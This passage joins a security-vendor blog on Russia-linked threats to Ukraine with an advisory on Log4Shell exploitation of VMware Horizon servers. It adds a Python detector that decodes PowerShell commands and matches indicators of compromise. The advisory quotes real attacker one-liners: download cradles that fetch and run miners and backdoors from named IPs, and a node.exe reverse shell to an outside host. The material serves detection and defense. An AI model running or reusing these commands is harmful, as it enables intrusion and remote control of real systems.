According to a report from the NSA, CISA, FBI, and NCSC, “From mid-2019 through early 2021, Russian General Staff Main Intelligence Directorate (GRU) … conduct[ed] widespread, distributed, and anonymized brute-force access attempts against hundreds of government and private sector targets worldwide.” GRU used the discovered credentials to gain access into networks and further used known vulnerabilities such as CVE-2020-0688 and CVE-2020-17144 to increase access.

The best mitigation for these types of attacks is to enable MFA on all systems. Minimize externally facing systems and ensure externally facing systems are fully patched.

Defacement

Ukraine has also been experiencing website defacements, which provide attackers with an opportunity to spread messaging. Website defacement is typically associated with hacktivist activity, but state-sponsored Russian actors could pose as hacktivists in order to disguise Russian state involvement, and spread their strategic communication themes to international audiences by defacing Western websites.

Website defacement often occurs as a result of weak passwords for admin accounts, cross-site scripting, injection, file upload, or vulnerable plugins. This can be managed by limiting the level of access accounts have and enforcing strong passwords. Additionally, looking for places where scripts or iframes could be injected or where SQL injection could occur can help identify vulnerabilities to remediate.

Ransomware

Ransomware could also be used to disrupt foreign targets. Criminals based in Russia were believed to be behind the 2021 ransomware attack on Colonial Pipeline in the United States. Ransomware can have disruptive effects on targets, and the attackers could simply refrain from decrypting files, even if they receive ransom payments, in order to maximize and extend the disruptive impact on victims. Additionally, opportunistic attackers who are actually looking for ransoms will still be on the prowl, and are likely to take advantage of the chaos.

To this end, defenders should:

  • Evaluate asset and application configurations to ensure resilience
  • Double-check visibility into the functioning of business-critical assets
  • Assess incident response processes in the case of an incident

What else should you be doing?

The following activities are mission-critical in times of uncertainty, but they are also best practices in general.

  • Continuous monitoring: Reinforce cybersecurity measures and staff during nights, weekends, and holidays. Threat actors are known to target their victims when there are gaps in “eyes on glass.”
  • Incident response plan: Prepare a dedicated team with a detailed workflow and a contact person that will be available offline in case of a cybersecurity incident.
  • Back up data: Implement data backup procedures of the company networks and systems. Backup procedures should be conducted on a frequent, regular basis for immediate recovery. Also, be sure to store backups offline and check them regularly to ensure they have not been poisoned with malware.
  • Reduce opportunities for attackers: Identify exposures, vulnerabilities, and misconfigurations that can provide opportunities for attackers to gain a foothold in your environment, and apply relevant mitigations or patches. In particular, Russian operators are well known to exploit edge systems. The Cybersecurity and Infrastructure Security Agency (CISA) recently put out an alert listing 13 known vulnerabilities that Russian state-sponsored threat actors use to initially compromise networks. We recommend this as a starting point for focused patching and mitigation.
  • Stay informed: Follow the latest updates and recommendations provided by Rapid7, as well as governmental security entities in specific press releases/alerts from the Ukraine CERT, The Security Service of Ukraine (SSU), and the US CISA.

We expect the situation to be fluid over the coming days and weeks, and security guidance and threats may also evolve as the conflict develops. The measures suggested in this blog will continue to be relevant, and we plan to provide additional information as needed.

In the meantime, you can also check this blog to see how Rapid7 can help you prepare for and respond to cyber attacks. We also recommend organizations check their government’s cybersecurity website for guidance.

Active Exploitation of VMware Horizon Servers

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/01/18/active-exploitation-of-vmware-horizon-servers/

This post is co-authored by Charlie Stafford, Lead Security Researcher.

Summary

Attackers are actively targeting VMware Horizon servers vulnerable to Apache Log4j CVE-2021-44228 (Log4Shell) and related vulnerabilities that were patched in December 2021. We’re sharing our observed activities and indicators of compromise (IOCs) related to this activity.

Details

Beginning Friday, January 14, 2022, Rapid7 Managed Detection & Response (MDR) began monitoring a sudden increase in VMware Horizon exploitation. The activity our teams are observing is similar to observed threat activity detailed by NHS Digital. Rapid7 services and research teams expect to see a continued strong upward trend in attacker activity directed at VMware Horizon instances vulnerable to Log4Shell exploits.

Rapid7 customers

Rapid7 InsightIDR and MDR customers: Alerts generated by the following detection rules can assist in identifying successful VMware Horizon exploitation:

  • Attacker Technique – PowerShell Download Cradles (created: Thursday, January 3, 2019, 15:31:27 UTC)
  • Suspicious Process – VMWare Horizon Spawns CMD or PowerShell (created: Thursday, January 6, 2022, 14:18:21 UTC)

Rapid7 researchers are currently evaluating the feasibility of adding a VMware Horizon vulnerability check for Nexpose/InsightVM.

We have a dedicated resource page for the Log4j vulnerability, which includes our AttackerKB analysis of Log4Shell containing a proof-of-concept exploit for VMware Horizon.

Recommendations

Patch Immediately: Organizations that still have a vulnerable version of VMware Horizon in their environment should update to a patched version of Horizon on an emergency basis and review the system(s) for signs of compromise. As a general practice, Rapid7 recommends never exposing VMware Horizon to the public internet, only allowing access behind a VPN.

Organizations are advised to proactively block traffic to the IPs/URLs listed in the IOCs section.

Observed activities

Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team has identified five unique avenues that attackers have taken post-exploitation, indicating that multiple actors are involved in this mass exploitation activity.

The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system.

TIDE has observed the attacker downloading cryptocurrency miners from the following URLs:

  • http://72.46.52[.]135/mad_micky.bat
  • http://80.71.158[.]96/xms.ps1
  • http://101.79.1[.]118/2.ps1

The following is an example PowerShell command from this activity (note that these contents were originally base64 encoded):

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://72.46.52[.]135/mad_micky.bat', $tempfile); & $tempfile

The System.Net.WebClient download cradle has also been used by one unknown actor to deploy a reverse shell based on Invoke-WebRev (https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Invoke-WebRev.ps1) from http://87.121.52[.]221:443/dd.ps1. Another actor has used it to download a Cobalt Strike backdoor from http://185.112.83[.]116:8080/drv. This backdoor was created using the trial version of Cobalt Strike, meaning it contains the EICAR anti-virus test string which should be identified by any AV vendor.

One actor attempts to use System.Net.WebClient to download a rudimentary backdoor from http://0.tcp.ngrok[.]io:18765/qs.exe. If this method fails, the PowerShell BitsTransfer object is used as a backup download method. In this instance, the actor is using ngrok[.]io URLs. NGrok is a tool that allows a user to tunnel traffic through a NAT or firewall. The backdoor communicates with http://2.tcp.ngrok[.]io:19969/index.php and will execute PowerShell commands received from that host.

Example command from this activity:

$a="http://0.tcp.ngrok[.]io:18765/qs.exe";$b="c:\windows\temp\qs.exe";$c = "c:\users\public\qs.exe";Import-Module BitsTransfer;try{(New-Object System.Net.WebClient).DownloadFile($a, $b);Start-Process -FilePath $b;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $b;Start-Process -FilePath $b;exit;}catch{};try{(New-Object System.Net.WebClient).DownloadFile($a, $c);Start-Process -FilePath $c;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $c;Start-Process -FilePath $c;exit;}catch{}

The final method TIDE has observed at Rapid7 customers involves the attacker using the copy of Node included with the VMware server at C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe. Node is used to execute a small snippet of JavaScript code that establishes a reverse shell to 146.59.130.58:

C:\"Program Files"\VMware\"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(4460, '146.59.130.58', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"

Indicators of compromise (IOC)

The full list of IOCs that TIDE has observed related to this activity is as follows:

  • 72.46.52[.]135
    • mad_micky.bat
    • 58e22726592ec5ab6ca49eda2fdb7017
  • 80.71.158[.]96
    • xms.ps1
    • e397087edf21ad9da907b595691ce15e
  • 101.79.1[.]118
    • 2.ps1
    • 6422ede9aadd1a768cb57fe06c1155ad
  • 87.121.52[.]221
    • dd.ps1
    • f7d5a47321e436fe33e03c4dbf29bd92
  • 185.112.83[.]116
    • drv
    • 00a4e6f11d2dae5146995aa489292677
  • 0.tcp.ngrok[.]io:18765
  • 2.tcp.ngrok[.]io:19969
    • qs.exe
    • 1fcf790cc9c66794ae93c114c61b412e
  • 146.59.130.58
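The command lines quoted above were delivered base64-encoded, so a detection that only inspects raw process arguments misses the cradle. The scanner below is an added example, not Rapid7's detection rules: it decodes PowerShell -EncodedCommand arguments (base64 of UTF-16LE text, which is how PowerShell defines that switch), looks for download cradle markers, flags cmd/PowerShell or node.exe -e launched from the Horizon server directory, and matches hosts and file hashes against the IOC list above. The event schema, sample events and placeholder parent process are constructed; the IOC values are the ones listed in the post, kept in the defanged [.] notation and normalised only at match time.

```python
"""Hunting the Horizon post-exploitation patterns in process events (added example)."""
import base64
import re

HORIZON_DIR = "c:\\program files\\vmware\\vmware view\\server\\"   # path from the post
CRADLE_MARKERS = ("system.net.webclient", "downloadfile", "downloadstring",
                  "start-bitstransfer", "import-module bitstransfer")

# IOCs as listed in the post (defanged); refanged only when matching.
IOC_HOSTS = {"72.46.52[.]135", "80.71.158[.]96", "101.79.1[.]118", "87.121.52[.]221",
             "185.112.83[.]116", "0.tcp.ngrok[.]io", "2.tcp.ngrok[.]io", "146.59.130.58"}
IOC_HASHES = {"58e22726592ec5ab6ca49eda2fdb7017", "e397087edf21ad9da907b595691ce15e",
              "6422ede9aadd1a768cb57fe06c1155ad", "f7d5a47321e436fe33e03c4dbf29bd92",
              "00a4e6f11d2dae5146995aa489292677", "1fcf790cc9c66794ae93c114c61b412e"}

ENC_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)  # -e / -enc / -EncodedCommand
URL_HOST = re.compile(r"https?://([^\s/:'\"]+)", re.IGNORECASE)
BARE_IP = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(value):
    return value.replace("[.]", ".")


def decode_encoded_command(cmdline):
    """Replace every -EncodedCommand payload with its decoded UTF-16LE text."""
    for m in ENC_ARG.finditer(cmdline):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
        except ValueError:          # not base64 or not UTF-16LE: leave the argument alone
            continue
        cmdline = cmdline.replace(m.group(1), text)
    return cmdline


def extract_hosts(text):
    text = refang(text)
    return set(URL_HOST.findall(text)) | set(BARE_IP.findall(text))


def analyze_event(ev):
    """Return the names of the rules that fire for one process creation event."""
    hits = []
    parent = ev.get("parent_image", "").lower()
    image = ev.get("image", "").lower()
    cmd = decode_encoded_command(ev.get("command_line", ""))
    low = cmd.lower()
    # Rule 1: the Horizon server launching a shell (the idea behind the MDR rule above).
    if parent.startswith(HORIZON_DIR) and image.endswith(("\\cmd.exe", "\\powershell.exe")):
        hits.append("horizon-spawns-shell")
    # Rule 2: PowerShell download cradle, visible only after decoding.
    if image.endswith("\\powershell.exe") and any(k in low for k in CRADLE_MARKERS):
        hits.append("powershell-download-cradle")
    # Rule 3: the bundled node.exe evaluating inline script that opens sockets/processes.
    if (image.startswith(HORIZON_DIR) and image.endswith("\\node.exe")
            and re.search(r"\s(-e|--eval)\s", cmd)
            and ("child_process" in low or "net.socket" in low)):
        hits.append("horizon-node-eval")
    # Rule 4: any IOC host in the decoded command line.
    ioc_hosts = extract_hosts(cmd) & {refang(h) for h in IOC_HOSTS}
    if ioc_hosts:
        hits.append("ioc-network:" + ",".join(sorted(ioc_hosts)))
    # Rule 5: the file's MD5 is on the IOC list.
    md5 = ev.get("file_md5", "").lower()
    if md5 in IOC_HASHES:
        hits.append("ioc-hash:" + md5)
    return hits


def scan(events):
    """Map event index -> fired rules, for events with at least one hit."""
    results = {}
    for i, ev in enumerate(events):
        hits = analyze_event(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample events. CRADLE_CMD and NODE_CMD are the command lines
# quoted in the post; the parent service name is a placeholder.
CRADLE_CMD = ("$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); "
              "$tempfile += '.bat'; $wc.DownloadFile('http://72.46.52[.]135/mad_micky.bat', $tempfile); & $tempfile")
ENCODED = base64.b64encode(CRADLE_CMD.encode("utf-16le")).decode("ascii")
NODE_CMD = (r'C:\"Program Files"\VMware\"VMware View"\Server\appblastgateway\node.exe -r net -e '
            '"sh = require(\'child_process\').exec(\'cmd.exe\');var client = new net.Socket();'
            'client.connect(4460, \'146.59.130.58\', function(){client.pipe(sh.stdin);'
            'sh.stdout.pipe(client);sh.stderr.pipe(client);});"')
HORIZON_SVC = "C:\\Program Files\\VMware\\VMware View\\Server\\bin\\example-service.exe"  # placeholder
POWERSHELL = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    {"parent_image": HORIZON_SVC, "image": POWERSHELL,
     "command_line": "powershell.exe -NoP -enc " + ENCODED},
    {"parent_image": HORIZON_SVC,
     "image": "C:\\Program Files\\VMware\\VMware View\\Server\\appblastgateway\\node.exe",
     "command_line": NODE_CMD},
    {"parent_image": "C:\\Windows\\explorer.exe", "image": POWERSHELL,   # benign admin use
     "command_line": "powershell.exe -NoProfile Get-Service"},
    {"parent_image": POWERSHELL, "image": "C:\\Windows\\Temp\\qs.exe",
     "command_line": "c:\\windows\\temp\\qs.exe", "file_md5": "1FCF790CC9C66794AE93C114C61B412E"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, rules)
```

Decoding before matching is the design point: the first sample event carries the mad_micky.bat cradle only in its encoded form, and the IOC host inside it is reachable for matching only after the UTF-16LE decode. The benign PowerShell event produces no hits, and the hash rule catches the dropped qs.exe regardless of letter case in the reported MD5.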
